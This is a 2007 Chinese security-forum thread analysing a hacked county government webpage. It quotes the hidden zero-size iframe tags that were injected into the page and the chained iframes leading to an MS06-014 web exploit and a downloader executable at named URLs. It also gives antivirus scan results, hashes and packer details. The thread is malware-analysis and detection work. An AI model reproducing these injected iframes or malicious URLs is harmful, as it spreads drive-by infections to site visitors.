收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 南华县政府网附属的政协页面被挂马了
12下一页
返回列表 发新帖
查看: 4287|回复: 13
收起左侧

[病毒样本] 南华县政府网附属的政协页面被挂马了

[复制链接]
dikex
发表于 2007-5-17 10:51:24 | 显示全部楼层 |阅读模式
感谢网友路过提供信息!

——————————————————————————————————————————————————————————————

这挂马世道,政府网站也难逃一劫:南华县政府网附属的政协页面http://www.ynnh.gov.cn/nhzx/Article_Show.asp?ArticleID=78被挂马了!

在源码的开始被添加了好几个iframe,但其实只有两个而已,其他都是重复的;

<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.game1983.com/index.htm width=0 height=0></iframe>

——————————————————————————————————————————————————————————————

http://www.game1983.com/index.htm 连接不成功-_-

——————————————————————————————————————————————————————————————

http://www.n85853.cn/index.htm最近已经见过好几次了:
<iframe src="http://www.1cdzx.cn" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.1008y.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.wcwcwc.cn/in/1.htm" width="0" height="0" frameborder="0"></iframe>

上次相比较更新了,但其实只有http://www.wcwcwc.cn/in/1.htm是新的,另外的最终还是执行上次的那几个,MS06-014网马,挂了一个毒http://www.wcwcwc.cn/in/1.exe报的不多,算是新的^_^;

AhnLab-V32007.5.16.105.16.2007 no virus found
AntiVir7.4.0.2305.16.2007 no virus found
Authentium4.93.805.16.2007 no virus found
Avast4.7.997.005.16.2007Win32:Singu-Q
AVG7.5.0.46705.16.2007 no virus found
BitDefender7.205.17.2007BehavesLike:Trojan.Downloader
CAT-QuickHeal9.0005.16.2007(Suspicious) - DNAScan
ClamAVdevel-2007041605.16.2007 no virus found
DrWeb4.3305.16.2007DLOADER.Trojan
eSafe7.0.15.005.16.2007Suspicious Trojan/Worm
eTrust-Vet30.7.363805.17.2007 no virus found
Ewido4.005.16.2007 no virus found
FileAdvisor105.17.2007 no virus found
Fortinet2.85.0.005.17.2007 no virus found
F-Prot4.3.2.4805.16.2007 no virus found
F-Secure6.70.13030.005.17.2007W32/Downloader
IkarusT3.1.1.705.16.2007 no virus found
Kaspersky4.0.2.2405.17.2007 no virus found
McAfee503205.16.2007New Malware.bx
Microsoft1.250305.17.2007 no virus found
NOD32v2227205.17.2007 no virus found
Norman5.80.0205.16.2007 no virus found
Panda9.0.0.405.16.2007Suspicious file
Prevx1V205.17.2007 no virus found
Sophos4.17.005.16.2007 no virus found
Sunbelt2.2.907.005.17.2007VIPRE.Suspicious
Symantec1005.17.2007Downloader
TheHacker6.1.6.11505.15.2007 no virus found
VBA323.12.005.16.2007BackDoor.Pigeon.1604
VirusBuster4.3.7:905.16.2007 no virus found
Webwasher-Gateway6.0.105.17.2007Win32.Malware.gen#PECompact (suspicious)



File size: 104545 bytes
MD5: ac54dd46d51ec1951c3dc2c3b894f099
SHA1: 3ba613040b8c8321a421071c17315b787249a1bd
packers: PECompact
packers: PECOMPACT, ZLIB
packers: PecBundle, PECompact


——————————————————————————————————————————————————————————————

样本密码:virus

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

mofunzone
发表于 2007-5-17 10:58:20 | 显示全部楼层
antivir被过,上报完毕
File ID          Filename          Size (Byte)         Result
544748          1.exe          101.41 KB          UNDER ANALYSIS
不过实际上,只要杀到这个文件就ok,因为运行后释放exe,只要这个被杀了,这个病毒整个就废了
File:           x105.rar
Status:        
INFECTED/MALWARE
MD5         3801e22d76bb29fa1e9eac118258d515
Packers detected:        
-
Scanner results
Scan taken on 17 May 2007 02:56:14 (GMT)
A-Squared        
Found nothing
AntiVir        
Found TR/Delphi.Downloader.Gen
ArcaVir        
Found nothing
Avast        
Found Win32:Delf-AEM
AVG Antivirus        
Found Downloader.Delf.8.BH
BitDefender        
Found BehavesLike:Trojan.Downloader (probable variant)
ClamAV        
Found nothing
Dr.Web        
Found nothing
F-Prot Antivirus        
Found Possibly a new variant of W32/Downloader-WebExe-based!Maximus
F-Secure Anti-Virus        
Found nothing
Fortinet        
Found nothing
Kaspersky Anti-Virus        
Found nothing
NOD32        
Found a variant of Win32/TrojanDownloader.Delf.NHL
Norman Virus Control        
Found nothing
Panda Antivirus        
Found nothing
Rising Antivirus        
Found nothing
VirusBuster        
Found nothing
VBA32        
Found Win32.Trojan.Downloader (http://...) (probable variant)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

jlennon
头像被屏蔽
发表于 2007-5-17 10:59:37 | 显示全部楼层

刺猬应该获个卡饭荣誉网页分析员

      

[ 本帖最后由 jlennon 于 2007-5-17 11:00 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

mofunzone
发表于 2007-5-17 11:01:48 | 显示全部楼层
实际这个病毒antivir杀不出来主要是zlib
zlib用的是和gzip一样的压缩算法,gzip好像antivir就脱不出来,7zip不知道有没有改善。。
回复

举报

dikex
 楼主| 发表于 2007-5-17 11:02:16 | 显示全部楼层
原帖由 jlennon 于 2007-5-17 10:59 发表
刺猬应该获个卡饭荣誉网页分析员


这个是骗贴用的,没有什么技术含量,当然如果那个××员是属于那种不用做而有好处的,我不介意
回复

举报

jlennon
头像被屏蔽
发表于 2007-5-17 11:04:14 | 显示全部楼层

论坛有准备特别搞个病毒分析,就有你们显伸手的地方了

回复

举报

bjfhj
发表于 2007-5-17 11:15:29 | 显示全部楼层
tart of the scan: 2007年5月17日  11:14

Starting the file scan:

Begin scan in 'D:\My Documents\0[1].htm'
D:\My Documents\0[1].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[2].htm'
D:\My Documents\0[2].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[3].htm'
D:\My Documents\0[3].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[4].htm'
D:\My Documents\0[4].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[1].htm'
D:\My Documents\1[1].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[2].htm'
D:\My Documents\1[2].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[3].htm'
D:\My Documents\1[3].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\ban[1].js'
D:\My Documents\ban[1].js
      [DETECTION] Contains signature of the exploits EXP/Ani.Gen
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\CA634TEZ.js'
D:\My Documents\CA634TEZ.js
      [DETECTION] Contains signature of the exploits EXP/Ani.Gen
      [INFO]      The file was deleted!


End of the scan: 2007年5月17日  11:15
Used time: 00:08 min
回复

举报

wangjay1980
发表于 2007-5-17 11:16:15 | 显示全部楼层
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\1.rar/1.exe//PE_Patch.PECompact//PecBundle//PECompact
回复

举报

wangjay1980
发表于 2007-5-17 11:17:38 | 显示全部楼层
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\x105.rar/x105.exe
回复

举报

buycard
发表于 2007-5-17 11:45:45 | 显示全部楼层
x105能杀出来的AV比较多。
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-1 23:44 , Processed in 0.128534 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表